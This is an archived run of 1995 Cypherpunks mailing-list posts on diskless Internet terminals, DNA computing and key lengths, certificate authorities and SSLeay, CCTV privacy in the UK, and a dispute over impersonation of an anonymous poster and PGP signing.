>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this weeks PC Week or Mac Week, as they both
>have several articles discussing this. Bottem line is that the under $1000
>computer seems to have no future either in industry or the home.
>
>Realisticaly, who in their right mind would buy a diskless workstation to
>connect to Internet? You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>Also, there is the fact that at the current time there are no generaly
>useable apps on Internet beyond the web and most companies would rather have
>their employees doeing something more productive than hanging ten.
>
>Anyone who bases their business on this technology won't have a business.

The same sort of things could be said of the telephone compared with
written correspondence. Why would anyone have one in their business or
home? Anyone can overhear a conversation, people will just chat, the only
thing you can do with it is talk, there is no record of the correspondence,
why would anyone want to talk to people on the other side of town? etc.

Think telephone, not computer. Think people over 40 who want a
communication tool with zero maintenance and zero learning curve.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Tue, 28 Nov 1995 14:36:51 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Terminals
Message-ID: <199511280620.WAA25319@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From mclow@owl.csusm.edu Mon Nov 27 20:07:37 1995

	Would you write and send e-mail if you had no way of
	archiving it?

This is what AOL is.

	Would you use "net-quicken", if it required all your data
	to be stored on a shared disk at Intuit?

Who are you kidding?  All your banking information is stored *at
your bank* today; how is that any different?

OBCrypto: none.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mp@moonmac.com (Michael Pearce)
Date: Tue, 28 Nov 1995 14:53:20 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re:ETH_ic?
Message-ID: <v02120d04ace02917b7e4@[204.119.62.251]>
MIME-Version: 1.0
Content-Type: text/plain


Nb5s $bp2s writes,

>>      ...the case has killed the hacker ethic. "If I saw someone
>>      on the Internet with a security weakness, at this point
>>      I would be reluctant to act the Good Samaritan and
>>      report it," said Jeffrey Kegler, an independent software
>>      consultant in Sunnyvale Calif. "If I saw weakness in
>>      Intel's machine, I'd keep it to myself."

If I saw a weakness in Intel's machine I would happily inform the company
in the safest way possible: posting it to Cypherpunks,
alt.destroy.microsoft, comp.sys.intel and any other appropriate newsgroup,
via anonymous server. I'm sure the information would wind up in the correct
hands _eventually_.

Not that I'm suggesting anything, of course.

|^^^^^^Please don't add "*@aol.com" to your twit filter. Thank you.^^^^^^|
|          mklprc@aol.com          |   "Give them a light and they'll    |
|          mp@moonmac.com         <*>       follow it anywhere!"         |
| http://www.teleport.com/~mklprc/ |               -- Firesign Theater   |
|   No Microsoft products were used in the production of this message.   |
\----smuggle FSF terrorist BATF (fnord) FBI nuclear Saddam PGP Clinton---/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 12:59:42 +0800
To: cypherpunks@toad.com
Subject: Inexpensive Crypto Boxes...
Message-ID: <199511280454.WAA00361@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The recent discussion on the <$1000 computer/appliance/digital-widget got me
to thinking and I had a spasm...

The new Sony Play Station is operating under a stripped down Unix.
Considering the speed that these boxes are designed to run at it seems a
natural for somebody to come up with a crypto workbench on ROM to install in
one of these babies. Could program one of the game controller ports as a
serial port and hook it to a Linux box (for example).

Ta ta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 14:07:06 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <acdfe4a7010210043794@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:04 AM 11/28/95, Thaddeus J. Beier wrote:
>>  I am curious on whether there are any applications of the directed
>> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
>> reaosn for asking is that I've come across something in my field (molecular
>> genetics) that can be used to solve such problems in a couple of weeks or so.
>>  -Allen
>>
>>
>Secret sharing can be done by Hamiltonian paths.  No public key code has been
>found to take advantage of those, or any other NP complete problem, so far as
>I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
>just makes the biggest one that you can solve a little bit bigger.  500 point
>graphs remain insoluble (pun unitended) for earth-sized vats of DNA.
>
>Really.

Thaddeus beat me to the punch, as I was going to say just about the same thing.

The work by Adleman on "vats of computers" is intriguing, but is no real
solution to the problem of exponential or superexponential growth: a
problem that Adleman's vat could solve with a fish tank full of DNA
computers in a day could be easily outpaced by a key length "only" a bit
longer.

Check the archives for many articles on this topic. Also, check the Web
search engines for conferences, papers, etc. on this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 28 Nov 1995 15:48:27 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.951127231345.28726A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, Jim Choate wrote:
> 
> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

We've had this discussion sort of before, but not involving consoles yet, 
so I'll throw in my 2p. 

It isn't likely to be worth doing this with a sony play-station; it's DSP
capabilities are nothing special, and you're paying way too much for
irrelevant stuff like CD-ROMs, 3D accellerators, etc. For the same money
you could get a load of 56Ks or some of the TI chips. If you must
canabalise a game system, you'ld be better off using either a Sega Saturn
(more general purpose CPU power), or mayhaps ripping apart an Atari
Jaguar, which has some nice custom DSP hardware, with a big fat bus to 
play with. It'd still be more of a stupid pet trick than a real solution, 
but definitely a neat hack.

Non-crypto.

BTW, I wouldn't be suprised if we do get to see some sort of Internet 
software for the next generation consoles. I remember getting a pretty 
good spit-take out of some of the NCSA guys at the WWW-WW in 93 when I 
mentioned AT&T were bringing out a modem for the sega genesis, and we 
were thinking about getting a dev kit and taking a shot at 'Sonic the 
Webhog' (turned out to be impractical - bit rate was too low, dev kits 
too expensive). With the new systems, the dynamics have changed (nvram in 
the machines, faster comms, more memory and CPU).

I still think that the idea of selling dickless workstations for the home 
is prehaps not the best response to rapidly falling disk prices; however, 
If you raise the price by $100, and use that money to add a 500Mb/1Gb 
hard drive, the whole thing becomes a lot more interesting - thats enough 
storage to keep your localy created data around (unlikely to exceed 
100Mb), whilst using the rest as a cache for stuff that really lives on 
the network. If I had any shirts worth betting I wouldn't put them on 
this concept, but it might be interesting.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: torrejr@pcnet.com
Date: Tue, 28 Nov 1995 13:32:06 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <Chameleon.951128011153.torrejr@>
MIME-Version: 1.0
Content-Type: text/plain



So far, everybody on the net has discussed the fun part(s) of the CA issue. 

The techies talk about protocol, encryption ... in short the real FUN stuff. I have enjoyed diverging 
opinions of  some of the participants. Many  make excellent points and have taught me more than I 
ever dreamed to learn.

Lawyers are already making money and preparing for the future :-) Some lawyers argue about 
liabilities and drool over new laws being proposed all over the country by other lawyers to 
guarantee future lawsuits. Another lawyer does not believe CAs are an option and make a good 
buck selling books to prove it (Electronic Commerce Law-Ben Wright squire) another publishes 
the American Bar Association CA liabilities, names it draft of the digital signature
guidelines and goes to work for Verisign (CA?  DS? UH?).

I can keep talking about good stuff that has happen in the last few months for about everyone 
interested in the last frontier (the electronic one) and its trading posts (electronic commerce), but 
the fact is that there are no CAs in full production yet. Yeah! Verisign is around .... Santa Clara. Of 
course I have other choices (Did I say great choices?)  like Cost in Sweden and at one time 
EuroCert in England was advertising on the net. 

I have been asking myself ... WHY? I can't accept the standard response: Fear to liability! Granted 
that the liability factor is important but my gut feeling tells me that's not the whole story. The 
hardware and the software is out there (I haven't commented on the quality of this stuff!). I thought 
that several companies who have indicated interest have all it takes to make a successfull CA but 
nobody seem to move reasonably fast.

Is it possible that the process of issuing and maintaining a certificate is so complex and expensive? I 
think that MITRE did a study for NIST and they came-up with a cost of $800 per year per federal 
employee to maintain and administer a Federal CA.  

Any suggestion?

PS I want to thank Robert Hettinga for his excellent work promoting the principles of the 
Cypherpunks, and for diseminating critical information that helps shape the corporate world  for a 
better electronic future. 
-------------------------------------
Juan Rodriguez i Torrent
torrejr@pcnet.com
11/27/95  23:54:24
-------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 28 Nov 1995 16:32:30 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ? - Part 2
Message-ID: <Pine.BSD.3.91.951128000018.20981B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 27 95 Press Association News in the UK reports: 
 
   STORM AS SPY CAMERA `JUICY BITS' SET FOR SALE 
 
 
"Furious MPs are demanding action," cries the story.  Why? 
 
   Their anger follows a row over the sale in video shops of 
   "juicy bits" from closed circuit TV cameras fixed in high 
   streets and stores to detect crime. 
 
 
High streets: where the fashionable retail shops are. 
 
   One extract showed a couple having sex in a doorway, 
   unaware they were being watched. 
 
 
It wasn't me, Mums, I swear! 
 
A Liberal Democrat family spokeswoman: 
 
   "That this sale has been allowed is a disgrace and will 
   undermine the trust the public has in cameras designed 
   to cut crime." 
 
 
A Labour MP: 
 
   "This situation plainly leaves people wide open to black- 
   mail." 
 
 
He said "some of his constituents in Linlithgow had recently
been compromised by such a video." 
 
A sly dog at the Home Office: 
 
   "We have not seen the video [good move!], but judging from 
   what has been said about it, it would have to be classified 
   by the British Board of Film Classification if it is being sold." 
 
 
If we don't have privacy, we do have censorship! 
 
But Mums, I swear... 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Press Association website's URL: 
 
             http://www.pa.press.net 
 
       The newsstory's online filename: pick8.html. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 19:39:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Directed Hamiltonian Path Problem
In-Reply-To: <acdfe4a7010210043794@[205.199.118.202]>
Message-ID: <199511280616.BAA11852@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> The work by Adleman on "vats of computers" is intriguing, but is no real
> solution to the problem of exponential or superexponential growth: a
> problem that Adleman's vat could solve with a fish tank full of DNA
> computers in a day could be easily outpaced by a key length "only" a bit
> longer.

Indeed. Its the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
359845775746985748039345677748242309854210746050623711418779541821530\
464749835819412673987675591655439460770629145711964776865421676604298\
31652624386837205668069376 liters of fluid.

I'll note that is something like
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
3598457757469857480393456777482423098542107460506237114187795418
times more liters of fluid than there are fundamental particles in the
universe -- being too lazy to calculate the number of fundamental
particles in a liter, I won't make the more relevant statement of what
multiple of the number of particles in the universe the number of
particles in that number of liters of fluid would be.

The stuff on quantum factoring worries me more than Adleman fluid -- I
never can get an explanation of it clear enough to decide if it is
more than a theoretical concern.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 16:38:51 +0800
To: cypherpunks@toad.com
Subject: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <ace0059603021004f459@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:17 AM 11/28/95, Steven Weller wrote:

>The same sort of things could be said of the telephone compared with
>written correspondence. Why would anyone have one in their business or
>home? Anyone can overhear a conversation, people will just chat, the only
>thing you can do with it is talk, there is no record of the correspondence,
>why would anyone want to talk to people on the other side of town? etc.
>
>Think telephone, not computer. Think people over 40 who want a
>communication tool with zero maintenance and zero learning curve.

I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

Folks I know who are not computer-savvy, or who have other things they'd
rather be doing, are not likely, as I see it, to buy boxes that still
require them to type messages to other people but that don't allow them to
download and save the interesting stuff they find.

The telephone appealed to those who truly wanted to "just keep
talking"...that was the beauty of it. Most people don't know how to
touch-type, and typing by hunting-and-pecking is painful and unnatural for
most people.

A couple of years ago "the computer for the rest of us" was said to be a
pen-based Newton-type machine, now it is said to be a diskless,
memory-limited "Eunuchs" machine.

(The diskless--and disketteless--systems I've seen described recently would
make it impossible for me to interact as I currently do. To be sure, maybe
"data storage services" will spring up to temporarily store stuff one has
snarfed, but the download to one's home terminal still must be done again.
Faster modems, and cable modems, will change things somewhat, but then this
is a huge change in a lot of ways, in any case. Even the stereotypcial
"chatters" at AOL are heavy users of local storage: witness the massive
number of "me too!" posts from AOLers whenever a nude GIF or JPEG of Sandra
Bullock or Jennifer Anniston is mentioned...they clearly are downloading a
lot of images and whatnot to home machines...that measly 4 MB of flash
memory is going to get filled up mighty fast.)

By the way, Intel builds a lot of the motherboards for use by various
companies. Someone at Intel claimed recently that even if the CPU was
completely free (as some 486s effectively are already), Intel could not see
how a system could be consistently built for under $500, including monitor,
small disk, memory, etc.

(The Oracle folks are muttering about a Newton-like OS which would load
objects or applets or whatever in a more efficient way...this might work,
but I'm still skeptical that user's needs can be met. Those folks wanting
local access to the JPEGs of Sandra Bullock will still be out of luck....)

I see a greater chance that home game machines, such as the 3DO and Sony
PlayStation machines will get Web browsers done for them than I do that
people will buy machines that are so limited.

The only relevance of this whole topic to Cypherpunks is....is....minimal.

--Tim May, who plans to find a way to use this boondoggle idea by Oracle to
make money. (Right now I'm long Oracle, but this may soon change.)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 28 Nov 1995 20:02:03 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.951128012308.9094C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Michael Froomkin wrote:

> This discussion puzzles me.  I thought we were bombarded with 
> reputational goods all the time:  brand names, stocks (what is a purchase 
> in the 2ndary market but a purchase of reputation most of the time?), 
> degrees from famous universities.  Anonymity compliates matters only if 
> no systems of unique ID is used.  Throw in digital signatures and we are 
> back at brand names, aren't we?

It's true that we deal routinely with reputations now.
However there is very little formal analysis of reputation as a concept.  
Although our common sense knowledge of reputations seem to serve 
us fairly well(*), there is no guarantee that it will scale well to an 
anonymous market where both the number of participants and the importance 
of reputation are much higher.

* However, the government apparently doesn't think so.  Witness the FDA and 
the SEC.

We need to have formal algorithms to deal with reputations, and we need 
to be able to show that they have desirable properties.  This will reduce 
transaction costs and help bring anonymous markets into the mainstream.  
Perhaps more importantly, good reputation algorithms will make 
agorics computing possible.  There is a very interesting proposal for a 
network routing system based on microcurrency and positive reputations 
(see http://www.webcom.com/agorics/dsr.html).  However it does not say 
what algorithms will be used to handle reputations.  If the system is 
actually implemented, its proper functioning will depend as much on the 
properties of the reputation algorithms used as on the correctness of its 
protocols.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 19:54:06 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511281032.CAA21495@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Perry E. Metzger wrote:


> Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > I have never signed any of my posts to this mailing list and frankly have
> > no intention of beginning at this point.
> 
> Well, signed Alice posts have shown up, so we will just have to assume
> that the above was a spoof and that the signed Alice posts are the
> real ones, now won't we?

Perry.  Normally I try my best to ignore you.

But I will simply repeat, I have never signed a post, and have no 
intention of beginning to sign any posts, until I establish a secure 
machine in a secure complex that is dedicated to that purpose.

I like to think that I take my security somewhat seriously.

And I would ask whoever DID post the PGP key under my name, to please
issue a revocation certificate. 

> Perry

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 28 Nov 1995 09:57:15 +0800
To: cypherpunks@toad.com
Subject: Cray's New T3E
Message-ID: <199511280140.CAA25757@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WSJ, Nov 27, 1995

Cray Research to Unveil 2nd-Generation Parallel Processor
for Technical Market

By William M. Bulkley

Cray Research Inc., bidding to reassert its dominance of
high-end scientific supercomputing, is expected to unveil
tomorrow a new parallel-processing supercomputer with
unprecedented speed.

The Eagan, Minn., computer maker has been best-known for
its multimillion-dollar vector supercomputers that use
just a few very powerful processors. The new Cray T3E
will be its second-generation parallel processor. Unlike
its predecessor the T3D, it operates without being
connected to a traditional vector supercomputer.

People familiar with the machine say it will have a
theoretical top speed of more than one trillion
operations a second, or one teraflops, a measure of
supercomputer speed. Currently the only planned teraflops
machine is one that Intel Corp. is building for the
Energy Department's Sandia National Laboratories.

'Back in the Game'

"We look at this as evidence of Cray reasserting its
franchise in the technical computing market," said Debra
Goldfarb, who follows supercomputers for International
Data Corp., a market research firm in Framingham, Mass.
"Cray's back in the game."

The smallest models are likely to be priced at well under
$1 million. Buyers will be able to increase power by
adding just a few processors at a time in the future
making the systems "highly scalable" in industry
parlance. The T3E can be built with as few as 16
processors or as many as 2,048 processors.

"This reconfirms Cray's capabilities to build very
efficient high-performance computers," said Philip
Samper, chairman and chief executive officer, who was
hired last spring. Cray has said it will report a net
loss for the current year, reflecting restructuring
charges as Mr. Samper cuts costs, and sales are weak as
customers have been waiting for new generations of both
Cray's T90 vector supercomputers and the T3E. Mr. Samper
said that Cray will be profitable in the current fourth
quarter on an operating basis before an expected
restructuring charge, and "We expect to be profitable in
1996. That's very important for this company."

Mr. Samper, who declined to discuss details of the T3E,
said in an interview, "We have $100 million in orders
already in house. When customers get so excited they put
money on the line, that's the ultimate test." The T3E
won't be available for sale until the end of the first
quarter of 1996. Cray's total backlog was $355 million at
the end of the third quarter, including orders for the
T3E.

Cray, the longtime leader in scientific supercomputing,
faced challenges from a host of smaller companies in the
late 1980s as well as three big Japanese computer makers.
But with the end of the Cold War, military need for
supercomputers diminished, Cray's sales plateaued and
several of the smaller companies went out of business.

Offsetting Some Declines

Analysts estimate the high-performance-computer market at
about $3 billion a year, with growth in commercial
markets for large databases and video-servers for
interactive-media, offsetting declines in government
business. International Business Machines Corp. and
Silicon Graphics Inc. have both grown rapidly by selling
parallel-processing systems in those markets.

Cray sells small commercial supercomputers and commercial
servers for computer networks of Sun Microsystems Inc.
workstations. However, analysts say it needs revenue from
the high-performance scientific market to rebound. Jay P.
Stevens, an analyst with Dean Witter, says sales in the
current year will fall 27% to $615 million from $921.6
million. Next year he forecasts a 20% rise to $808
million. Mr. Stevens predicts a net loss before charges
for 1995 of $73 million, or $1.25 a share, compared with
net income of $55.7 million, or $2.32 a share, in 1994.

Mr. Samper said that during the year, Cray has reduced
research-and-development spending by 16% and lowered
overheads. He said it plans to buy more parts from
outside suppliers, and is also controlling costs by
negotiating with government agencies to have them pick up
certain research and support costs.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 28 Nov 1995 20:26:03 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <v02130500ace045aa0b50@[165.254.158.230]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 11/27/95, Dan Harmon wrote:

>One reason for the ssn's is that it maybe a LEA sponsered promo. If you a
>dumb enough to have a warrent or other some judgement against you and you
>give your ssn and address to a person or enity that you don't know then
>shame on you.


This reminds me of an incident that occurred in California last year. A
number of people received a notice that they had just won an
all-expenses-paid trip. Most of them turned up to get their gift only to
then discover that it was a Government Sting Operation and that the trip
was to Jail (they were all wanted on outstanding warrants which were
waiting for them when they arrived at the meeting site).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 28 Nov 1995 01:39:42 +0800
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>
Message-ID: <Pine.SOL.3.91.951128030744.19145A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 27 Nov 1995, Jyri Kaljundi wrote:
> What software there is available (preferably non-commercial) to become a 
> CA? Is for example the SSLeay package enough?

I'm just making a quick comment on this point.  The current SSLeay setup, 
I would say no.  You can do it but you need to write more stuff to do it 
correctly.  It is a bit of an evil cludge.

The next version should be able to do this (I hope, depending on time).
The next version has (will have) several different ways to 'retrieve'
certificates which can be added via an run time API (the application can
'push' new methods into the library during startup). I will probably not
have time to put in a 'socket' based certificate server but it should be
simple enough for this to be written by other people. It should also be
simple enough for other people to write some routines that conform to the
API so that the netscape DB files can be accessed by SSLeay (along with
the current SSLeay 'hash directories' and the socket based lookup (if it
gets put in)). 

The most importaint change is that I will support CRL if they are 
present and probably generate an 'warning' if there is no CRL.  I still 
need to write a simple application to do a basic 'keep track of issued 
certificates' and generate a CRL if required.  The library routines to 
write a CA are present, they just need to be glued to a simple database 
(which I will probably do in my demo case via ascii files in directories).

This version will also hopefully support the concept of selecting a 
certificate/private key from a set of certificates, attempting to pick a 
certificate that is in the same 'tree' as another certificate.

This concept of multiple certificates for a person is useful for
SSLtelnet, so that each 'host domain' can issue it's own certificates (and
keep track of it's own CRL).  To let some-one login, just issue them with
a 'certificate' for that 'host domain'. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 20:43:04 +0800
To: cypherpunks@toad.com
Subject: Re: bit quiet in here lately
Message-ID: <199511281234.EAA17790@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, David K. Merriman wrote:

> At 02:11 AM 11/24/95 -0500, futplex wrote:
> >sameer writes:
> >> 	I am working on a spec which myself and others will turn into
> >> an internet draft, for placements on the standards track.  It will
> >> standardize remailer commands and nymserver commands, and will
> >> incorporate payment. Once we get a draft written up it will be posted
> >> for review, flames, and criticism.

      [snip to save bandwidth]

> Now, if the remailer service-listing operators could agree on a standard
> format for their reporting (lag time, feature lists, etc), then it would
> simplify maintaining a list of remailers - which would increase the
> usability of the remailer system, and help the use and growth of remailers.

The remailer operators can't even agree on a standard header syntax.  Some
support one header to request remailing, while others support another. 

I remember some time ago, that I was using a non-compliant (i.e. unique)
remailer located in Berkeley.  I was trying to post some information that
would have helped to expedite the FDA approved study on medicinal
marijuana. 

The article detailed that Health & Welfare Canada was growing a bumper
high-potency crop to help teach the Edmonton city police about the wicked 
weed.  Especially, cultivation techniques.

I thought that this might be "helpful" to the medicinal marijuana study. 
I thought that since the Canadian Government was granting licenses to
help law enforcement, that they might not be opposed to studying its
possible health benefits as well. 

(Canada's government funded health care system, could use some cost saving
measures.  If there is something useful there, it could help redirect
funding, and indirectly ameliorate the current waiting lists and service
cuts for all Canadians.)

I thought that the study organizers in the United States, MAPS I believe
 -- the ones who had complied with all US laws and regulations and permits
and headed up by a guy named, Rick Doblin, a fellow who's apparently
writing a thesis on Public Policy at the Kennedy School of Government at
Harvard -- I thought that the study organizers might be able to get what
they needed from the Canadian FDA equivalent, Health & Welfare, Canada. 

(Disclaimer: Unofficially, of course, not speaking for Health & Welfare 
Canada.  I have absolutely no connection with anyone, anywhere or 
anything at all in any possible form whatsoever.  In fact this post may 
well be the product of random typing by a simian life form.)

Silly me.

The damn post never was posted.  It was either editted out of the data
stream, or something else nefarious occurred. 

I mailed the remailer-operator about this, and asked: "What's the problem?"
And the remailer operator didn't reply to the message. 

*Sigh* 

Now, no-one in Berkeley, not a cypherpunk of all people, could be opposed
to seeing marijuana legalized, now could they??  I mean not, California,
eh?? 

Maybe, I just couldn't figure out how to post, and how to use a 
remailer.  I don't know.  Or maybe I had one too many beers and should've
stuck to having soda's.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S. (Come on down for a briefing to msri ... ya ... right ... 
        "persuasion" just isn't all that appetizing, Joe ... ;)  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 22:22:44 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Message-ID: <199511281400.GAA22636@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 Nov 1995, an impostor posing as Alice de 'nonymous wrote:

> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> 
> > Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > > I have never signed any of my posts to this mailing list and frankly have
> > > no intention of beginning at this point.
> > 
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
> 
> Perry.  Normally I try my best to ignore you.
> 
> But I will simply repeat, I have never signed a post, and have no 
> intention of beginning to sign any posts, until I establish a secure 
> machine in a secure complex that is dedicated to that purpose.

This insistence on not making use of authentication tools at the same
time as whining about people spoofing you is what caused me to assume
your identity.  You were given ample warning.

Consider it a demonstration of why you should do just what you are
stubbornly refusing to do: generate yourself a damn key!

It is the best way to ensure a persistent persona whilst retaining
anonymity.

> I like to think that I take my security somewhat seriously.

For a purportedly security conscious impostor, you sure are reluctant
to make use of simple authentication tools.  Your risk assesment is
seriously out of whack too.

You do *not* need a secure machine to improve the level of
authentication of your posts: signing your posts would provide better
authentication than no authentication, even if the machine is not
tempest shielded, nor in a secure installation.

Finding your machine (we don't know remember), and installing a kernel
patch to catch your passphrase as it is typed in, or snag it from PGPs
core image is much harder to achieve, even if you are using a multi
user system.

PGP signing your post will give a much better authentication than
people who post from known email addresses; forgeries, and machine
breakins are not that hard to effect.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate.

Oh so you do care about authentication :-)

An offer: you post your own key, and I'll post a revocation.

You might find that people take you more seriously once they know they
are talking to a persistent persona.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLsT3obu8OQjKS7RAQE62gQAoTxWo6Dipa1bZeNi5NygZ/9CLJ2pn44s
KN2TFWY0n1KPC4tibEM88GOI7vHCCLE8t/XQ2zx5YArjd/7toCidAlUY07vQ6ums
sL4J8oV4JDKdpq9WTWaTS/unBww8qBJRVDBHigtiOneIkmu6kfuBEh0JR+a5plfQ
00GQ4SfcyBk=
=SAXZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 28 Nov 1995 14:36:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <nanomius@netcom.com>
Message-ID: <Pine.BSD.3.91.951128061214.23333A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   well, if it is not the world's greatest thinker and knowledge bearer 
on Nastrodamus posting an announcement on a message we've already seen 
at least twice, and hashed.

   read the threads before you post!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 28 Nov 1995 20:55:16 +0800
To: cypherpunks@toad.com
Subject: (fwd) Netscape V2 and Certificates
Message-ID: <v02120d06ace0b53ee92e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



